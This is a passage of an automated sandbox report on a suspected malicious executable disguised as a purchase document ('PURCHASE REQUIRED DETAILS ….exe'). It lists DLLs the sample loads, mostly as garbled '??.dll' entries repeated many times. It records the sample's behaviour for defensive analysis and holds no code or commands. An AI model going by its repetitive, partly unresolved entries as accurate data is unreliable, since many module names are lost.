                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: url.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ieframe.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: mapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ????.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ???.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
